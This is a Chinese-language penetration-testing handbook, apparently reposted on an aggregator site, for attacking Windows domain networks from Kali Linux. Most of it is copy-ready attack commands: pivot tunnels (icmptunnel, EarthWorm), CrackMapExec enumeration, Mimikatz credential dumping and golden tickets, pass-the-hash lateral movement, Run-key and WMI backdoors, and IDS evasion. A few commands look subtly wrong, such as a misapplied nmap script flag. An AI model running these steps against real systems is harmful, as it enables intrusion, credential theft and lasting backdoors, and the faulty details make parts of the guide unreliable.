Kali Linux 内网渗透:深度工程实施手册

第一阶段:隧道与代理(内网渗透的 “高速公路”)

在内网中,你经常遇到的情况是:你只能控制一台 Web 服务器,但它身后有 10.10.10.x/24 的核心网段。你的 Kali 无法直接访问内网 IP,必须通过 Web 服务器(跳板)进行转发。

1. 隐蔽隧道:ICMP (Ping Tunnel)

场景:防火墙封禁了 TCP/UDP 出站,但允许 Ping (ICMP)。工具:icmptunnel(Kali 默认未安装,需自行下载编译或使用现成脚本)。

  • Kali (服务端):

    bash

    运行

    # 开启 IP 转发 echo 1 > /proc/sys/net/ipv4/ip_forward # 允许非 root 用户 Ping sysctl -w net.ipv4.ping_group_range="0 2147483647" # 启动服务端 ./icmptunnel -s # 设置虚拟网卡 IP ifconfig tun0 10.10.10.1 netmask 255.255.255.0
  • 跳板机 (Windows):上传icmptunnel.exe

    cmd

    icmptunnel.exe -c <Kali公网IP> # 在跳板机上设置路由,将内网流量指向隧道 route add 10.10.10.0 mask 255.255.255.0 10.10.10.2

2. 多重跳板:EarthWorm (EW) 与 Socks 代理

场景:目标内网有多层(A -> B -> C),你需要穿透多层才能到达核心。工具:ew_for_linux64/ew_for_Win.exe

  • Kali (监听端):

    bash

    运行

    ./ew -s rcsocks -l 1080 -e 8888
  • 第一层跳板 (A 机):

    cmd

    ew -s rssocks -d <KaliIP> -e 8888
  • 第二层跳板 (B 机):

    cmd

    ew -s lcx_slave -d <A机IP> -e 8888 -f <B机IP> -g 9999
  • 核心机 (C 机):

    cmd

    ew -s lcx_listen -l 9999 -e 1080
  • 最终连接:配置/etc/proxychains4.conf指向127.0.0.1:1080,即可直接访问 C 机内网。

第二阶段:域内信息收集(绘制 “藏宝图”)

拿到域内一台机器权限后,不要急着扫描,先进行被动侦察

1. 极速资产探测:CrackMapExec (CME)

这是内网渗透的 “瑞士军刀”,必须熟练掌握。

  • 探测存活主机与 SMB 签名状态:

    bash

    运行

    proxychains crackmapexec smb 192.168.1.0/24
  • 导出所有域用户列表 (需低权限账号):

    bash

    运行

    proxychains crackmapexec ldap <DC_IP> -u 'user' -p 'pass' --users
  • 寻找未打补丁的机器 (如 MS17-010):

    bash

    运行

    proxychains crackmapexec smb 192.168.1.0/24 -u '' -p '' --scripts smb-vuln-ms17-010

2. 黄金票据与白银票据:Mimikatz

在内网横向移动中,抓取 Hash 是基础,但票据传递更隐蔽。

  • 抓取 LSASS 内存 (获取 Hash):在 Meterpreter 中:

    meterpreter

    load kiwi creds_all # 或者直接迁移进程后 migrate -N lsass.exe hashdump
  • 制作黄金票据 (Golden Ticket):前提:已获取krbtgt账号的 Hash 和Domain SID

    cmd

    mimikatz "kerberos::golden /domain:test.local /sid:S-1-5-21-xxxx /rc4:<krbtgt_hash> /user:Administrator /ptt" exit
    (此时你已拥有域管理员权限,可直接访问任意机器)

第三阶段:横向移动(渗透的 “闪电战”)

1. 哈希传递 (PTH) - 不需要密码明文

  • 利用 Impacket 的 psexec.py:

    bash

    运行

    proxychains python3 /usr/share/doc/python3-impacket/examples/psexec.py -hashes <LM_hash>:<NTLM_hash> Administrator@192.168.1.105
  • 利用 CrackMapExec 执行命令:

    bash

    运行

    proxychains crackmapexec smb 192.168.1.105 -u Administrator -H <NTLM_hash> -x "whoami"

2. WMI 横向移动 (无文件落地)

场景:目标关闭了 445 端口 (SMB),但开启了 135 (WMI)。工具:wmiexec.py

bash

运行

proxychains python3 /usr/share/doc/python3-impacket/examples/wmiexec.py -hashes :<NTLM_hash> Administrator@192.168.1.106 "ipconfig"

3. WinRM (PowerShell 远程)

场景:目标开启了 WinRM (5985/5986),这是横向移动的 “快车道”。工具:evil-winrm

bash

运行

proxychains evil-winrm -i 192.168.1.107 -u Administrator -H <NTLM_hash>

第四阶段:权限维持(种 “不死鸟” 后门)

拿下域控后,如何确保下次还能进来?

1. 隐蔽账号 (Shadow Credentials)

原理:利用 AD CS (证书服务) 为域管账号添加一个备用的 Key Credential,无需修改密码。工具:Whisker.exe

  • 添加影子凭据:

    cmd

    Whisker.exe add /target:Administrator
  • 利用影子凭据登录 (Rubeus):

    cmd

    Rubeus.exe asktgt /user:Administrator /certificate:<Base64_Cert> /password:<Cert_Password> /getcredentials

2. 注册表后门 (Registry Persistence)

场景:目标是工作组机器,无杀毒软件。操作:

cmd

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v UpdateService /t REG_SZ /d "C:\backdoor.exe" /f

3. WMI 事件订阅后门

场景:非常隐蔽,几乎不落地文件。工具:WMIBackdoor.ps1

powershell

Import-Module .\WMIBackdoor.ps1 Set-WmiBackdoor -User "backdoor" -Password "P@ssw0rd"

第五阶段:Kali 内网排错与流量控制

在内网渗透中,**“网络不通”** 是最大的敌人。

1. 流量转发排查

如果发现代理不通,使用tcpdump在 Kali 上抓包:

bash

运行

tcpdump -i tun0 port 1080 -n

检查是否有数据包进来。如果有进无出,检查ip_forward

bash

运行

sysctl net.ipv4.ip_forward

2. 规避 IPS/IDS

  • 修改扫描速度:Nmap 扫描过快会被拉黑。

    bash

    运行

    proxychains nmap -sT -Pn -p- --scan-delay 1s 192.168.1.100
  • 使用静态二进制文件:在跳板机上,尽量使用静态编译的工具(如static-nmap,static-nc),避免依赖库缺失问题。

附录:必备工具包清单 (建议下载并打包)

在实战中,你需要将这些工具上传到跳板机:

  1. 信息收集:SharpHound.exe(BloodHound),PowerView.ps1
  2. 凭证提取:mimikatz.exe,Procdump.exe,LaZagne.exe
  3. 隧道工具:frp,nps,reGeorg,EarthWorm
  4. 横向移动:CrackMapExec(Linux/Win 版),PsExec.exe,PAExec.exe(PsExec 的无 DLL 版本)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/1183343.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

2026年AI优化推荐:基于多行业实战评价,针对流量分散与转化痛点指南 - 十大品牌推荐

2026年五大标杆AI优化公司权威行业测评TOP5,AI优化公司哪家强 随着生成式人工智能技术全面渗透商业场景,企业获取流量与用户认知的核心阵地已从传统搜索引擎转向AI对话界面。AI优化(此处特指生成式引擎优化GEO)作为…

多智能体协作驱动的多模态医疗大模型系统:RAG–KAG双路径知识增强与架构的设计与验证(上)

摘要 多模态医疗大模型在医学影像解读与临床文本自动化生成方面展现了突破性的潜力&#xff0c;为智慧医疗的发展注入了强劲动力。然而&#xff0c;在面向真实世界、高风险的临床环境部署时&#xff0c;这类模型普遍面临三大核心挑战&#xff1a;一是多源异构数据&#xff08;如…

【教程4>第10章>第22节】基于FPGA的图像Laplace边缘提取算法开发——Laplace拉普拉斯卷积运算模块

目录 1.软件版本 2.Laplace拉普拉斯卷积运算模块的实现分析 3.Laplace拉普拉斯卷积运算模块的verilog实现 欢迎订阅FPGA/MATLAB/Simulink系列教程 《★教程1:matlab入门100例》 《★教程2:fpga入门100例》 《★教程3:simulink入门60例》 《★教程4:FPGA/MATLAB/Simulink联合…

避坑指南:精准度高、售后好的国产不锈钢电子地磅品牌推荐,上海花潮实业实力解析 - 品牌推荐大师1

面对市场上琳琅满目的电子地磅品牌和型号,许多采购者在挑选时往往感到迷茫:究竟哪一款才适合自己?如何判断一台地磅的质量好坏?是看重价格、量程,还是品牌?本文将以上海花潮实业有限公司的不锈钢电子地磅为例,为…

深入解析:概率论与数理统计第一章 概率论的基本概念

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …

软件测试在职人员,如何持续学习?

中国有句俗话叫“活到老&#xff0c;学到老”&#xff0c;虽然进入职场的我们已经远离了学校&#xff0c;但这并不代表着就可以不再学习。持续性的学习不仅能增长我们的见识&#xff0c;也能让职场中的我们变得更加优秀。但在忙碌的职场生活中&#xff0c;职场中软件测试同学该…

技术文章:解决 PowerShell 模块加载无响应问题的实用指南

技术文章&#xff1a;解决 PowerShell 模块加载无响应问题的实用指南 摘要 本文通过分析 Invoke-Obfuscation 模块加载案例&#xff0c;深入探讨了 PowerShell 模块加载的各种机制&#xff0c;并提供了一套系统性的故障排除方法。文章适合 PowerShell 开发者和系统管理员阅读。…

2026国内最新螺丝定制厂家最新top5排行榜发布!广东等地优质组合螺丝/端子螺丝/螺丝定制/螺丝加工公司及供应商综合实力盘点 - 品牌推荐2026

随着制造业智能化升级与新能源、汽车电子等高端领域蓬勃发展,螺丝作为核心基础紧固件,其定制化需求呈现爆发式增长,对精度、性能与交付效率的要求达到新高度。但行业普遍存在规格匹配度不足、品质稳定性欠缺、定制周…

提拔快的项目经理,打死也不会告诉别人的3个反向操作!

职场里项目经理想往上走&#xff0c;真&#x1f645;不是光靠埋头干活就行。 有些人天天埋头干活&#xff0c;项目接了不少&#xff0c;班也加了不少&#xff0c;可职位就是不升&#xff1b;反观另一些人&#xff0c;看着没怎么干活&#xff0c;反而升得飞快。 很多人觉得人家…

探讨忻州比较好的geo推广机构情况,如何选择 - 工业品牌热点

在AI搜索重塑企业获客逻辑的当下,GEO推广作为抢占AI搜索流量的核心手段,成了ToB企业破局获客难的关键。但市面上GEO推广机构鱼龙混杂,企业该如何选到搜得到、接得住、效果稳的合作伙伴?本文通过五个高频问题,结合…

大模型学习指南:10个核心概念详解,收藏学习不走弯路

这篇文章是写给AI初学者的指南&#xff0c;详细解释了10个让小白头疼的大模型核心概念&#xff1a;Token、Context Window、Temperature等。作者用通俗易懂的比喻和实例&#xff0c;将复杂技术概念转化为普通人能理解的内容&#xff0c;帮助读者真正掌握AI时代的入门知识。文章…

AI一周重要会议和活动概览(1.19-1.25)

一、【会议通知】第40届AAAI人工智能国际会议将于2026年1月20日至27日在新加坡博览中心举行AAAI人工智能会议&#xff08;AAAI Conference on Artificial Intelligence&#xff09;由人工智能促进会&#xff08;AAAI&#xff09;主办&#xff0c;是人工智能领域中历史最悠久、涵…

vLLM模型脚本目录规范

目录一、通用结论(直接可用)大模型存放的目录模型下载目录:这是最重要的点1️⃣ HuggingFace 默认行为(不推荐长期用)2️⃣ 正确做法:显式指定模型目录(强烈推荐)方法一:设置环境变量(最常用)方法二:直接指…

基于51/STM32单片机交流直流电压电流电表功率电量过载抄表无线设计(设计源文件+万字报告+讲解)(支持资料、图片参考_相关定制)_文章底部可以扫码

02-电表 基于51/STM32单片机交流直流电压电流电表功率电量过载抄表无线设计(设计源文件万字报告讲解)&#xff08;支持资料、图片参考_相关定制&#xff09;_文章底部可以扫码直流电压直流电流AD转换LCD1602液晶C51-62 交流电压电流功率过载保护AD转换报警液晶C51-86N 蓝牙无线…

2026年AI搜索优化推荐:基于垂直行业实战排名,涵盖B2B与消费场景获客痛点 - 十大品牌推荐

2026年中国AI搜索优化服务商格局新观察:头部企业梳理与选择推荐 2025至2026年,生成式AI应用全面渗透,AI原生搜索与智能推荐已成为品牌获取用户与增长的核心渠道,AI搜索优化(GEO)也随之从一种探索性工具,升级为企…

黄金票据是什么

黄金票据&#xff08;Golden Ticket&#xff09;&#xff0c;在内网渗透中&#xff0c;是最高权限的象征&#xff0c;是通往域控制器&#xff08;DC&#xff09;的万能钥匙。为了让你理解它&#xff0c;我们先不讲枯燥的 Kerberos 协议&#xff0c;我们来打个比方。一、 通俗比…

STM32智能PID无刷电机PWM调速正反转设计(设计源文件+万字报告+讲解)(支持资料、图片参考_相关定制)_文章底部可以扫码

23-440、STM32智能PID无刷电机PWM调速正反转设计(设计源文件万字报告讲解)&#xff08;支持资料、图片参考_相关定制&#xff09;_文章底部可以扫码产品功能描述&#xff1a; 本系统由STM32F103C8T6单片机核心板、1.44寸TFT彩屏、&#xff08;无线蓝牙/WIFI模块-可选&#xff0…

USB口OVP过压保护芯片

型号:PW2609A PW2609A是一颗常用于USB口端,做输入的过压保护芯片,输入耐压40V,OVP过压保护可默认6.1V或者可调OVP设置选择,地内阻,可达通过3A电流, 板子图片 一、核心保护功能测试 测试项目 测试目的 简要测试…

STM32单片机心率血氧血压温度检测082X(设计源文件+万字报告+讲解)(支持资料、图片参考_相关定制)_文章底部可以扫码

STM32单片机心率血氧血压温度检测082X(设计源文件万字报告讲解)&#xff08;支持资料、图片参考_相关定制&#xff09;_文章底部可以扫码产品功能描述&#xff1a; 本系统由STM32F103C8T6单片机核心板、TFT1.44寸彩屏液晶显示电路、XGZP6847A血压检测电路、MAX30102血氧心率检测…

2026年自学网络安全入门教程(非常详细)从零基础入门到精通,看完这一篇就够了

如何入门网络安全_网络安全自学 由于我之前写了不少网络安全技术相关的故事文章&#xff0c;不少读者朋友知道我是从事网络安全相关的工作&#xff0c;于是经常有人在微信里问我&#xff1a; 我刚入门网络安全&#xff0c;该怎么学&#xff1f;要学哪些东西&#xff1f;有哪些…